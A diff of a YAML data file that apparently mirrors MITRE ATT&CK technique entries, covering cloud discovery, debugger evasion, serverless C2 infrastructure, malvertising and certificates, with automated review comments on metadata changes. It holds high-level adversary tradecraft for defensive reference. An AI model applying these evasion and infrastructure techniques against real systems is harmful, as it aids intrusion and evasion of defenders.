Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -57295,15 +57984,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
@@ -57331,9 +58021,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -57408,7 +58095,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - arp nix
@@ -57533,7 +58219,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests:
- name: Port Scan
@@ -57660,7 +58345,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests:
- name: Find and Display Safari Browser Version
@@ -57680,7 +58364,7 @@ discovery:
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -57701,12 +58385,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
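Review bot: the T1538 platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, so anything downstream that selects techniques by the old platform strings will now silently exclude T1538. Check that every consumer of `x_mitre_platforms` in this repo knows the new names before merging, and note in the commit message that this is an upstream platform consolidation, since the only other change to the object is the `x_mitre_version` bump to 1.4 and the `modified` update in the hunk above.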
@@ -57731,7 +58414,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -57786,7 +58468,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
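Review bot: `modified` for T1622 moves backwards here, from 2022-05-11 to 2022-04-16, and the same regression appears later in the patch for T1583.002, T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003, all of which (except T1622) also lose `x_mitre_attack_spec_version`. The replaced values `2022-04-25T14:00:00.188Z` and `2022-05-11T14:00:00.188Z` are identical across unrelated objects, which is the signature of a bulk conversion stamp, whereas the incoming 2021 and early-2022 dates look like per-object timestamps read from an older bundle. Confirm which ATT&CK bundle the generator consumed for these entries and regenerate from a single source, otherwise this patch mixes releases within one file.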
@@ -57806,7 +58488,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
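Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` after its `spec_version` line goes, whereas every other entry in this patch that was at 2.1.0 and is not bumped to 3.2.0 (T1583.002, T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003) has both keys removed. Either T1622 should lose the key as well or, preferably, the other eight should keep it; an entry with no attack spec version at all cannot be distinguished from a pre-spec object when the file is consumed.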
@@ -57909,7 +58590,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery in FreeBSD/macOS
@@ -57927,7 +58607,7 @@ discovery:
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -57938,7 +58618,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -58009,29 +58689,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
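Review bot: most of this hunk is key reordering rather than content: `x_mitre_detection`, `x_mitre_platforms`, `x_mitre_is_subtechnique`, `x_mitre_contributors` and `x_mitre_version` are deleted and re-added in new positions, which buries the three real edits (the Google Apps Script sentence and its new `GWS Apps Script Abuse 2021` citation, the `Hide Infrastructure` cross-reference, and the version bump to 1.1). Have the generator emit keys in a fixed order (sorted, or the order the upstream STIX object uses) so reviews only show substantive changes; the same churn recurs in the T1588.004 and T1586.003 hunks below.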
@@ -58055,15 +58734,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
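Review bot: the URL for the new `GWS Apps Script Abuse 2021` reference ends in `#google_vignette`, which is the fragment an AdSense interstitial appends in the browser address bar, not part of the article address. Store it without the fragment:
  url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/
If this text is a verbatim mirror of upstream ATT&CK, raise it there too, since a fragment in a citation URL propagates to every consumer of this file.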
@@ -58095,17 +58777,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -58158,11 +58839,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -58198,7 +58878,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -58247,43 +58927,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -58296,18 +58945,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
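Review bot: after the reorder the T1588.004 object still carries all five external references (mitre-attack, DiginotarCompromise, Recorded Future Beacon Certificates, Splunk Kovar Certificates 2017, Let's Encrypt FAQ), so nothing was dropped; the substantive edits are the Recorded Future URL moving to `/research/cobalt-strike-servers` with a 2024 retrieval date, the new `revoked: false` and `x_mitre_deprecated: false` flags, and the attack spec version going to 3.2.0 while `x_mitre_version` stays at 1.2. Because the preceding hunk deletes the same block wholesale, add a line to the commit message stating this is a field-order normalisation plus a reference refresh; as it stands the 43-line deletion reads as if the technique were being removed.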
@@ -58329,7 +59009,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -58345,8 +59025,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
@@ -58368,7 +59046,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -58388,8 +59066,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -58428,7 +59104,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -58449,8 +59125,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -58480,7 +59154,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -58517,8 +59191,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -58540,7 +59212,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -58562,8 +59234,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -58600,7 +59270,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -58622,8 +59292,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -58685,7 +59353,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -58707,7 +59374,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -58725,8 +59392,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -58761,7 +59426,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -58780,33 +59445,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
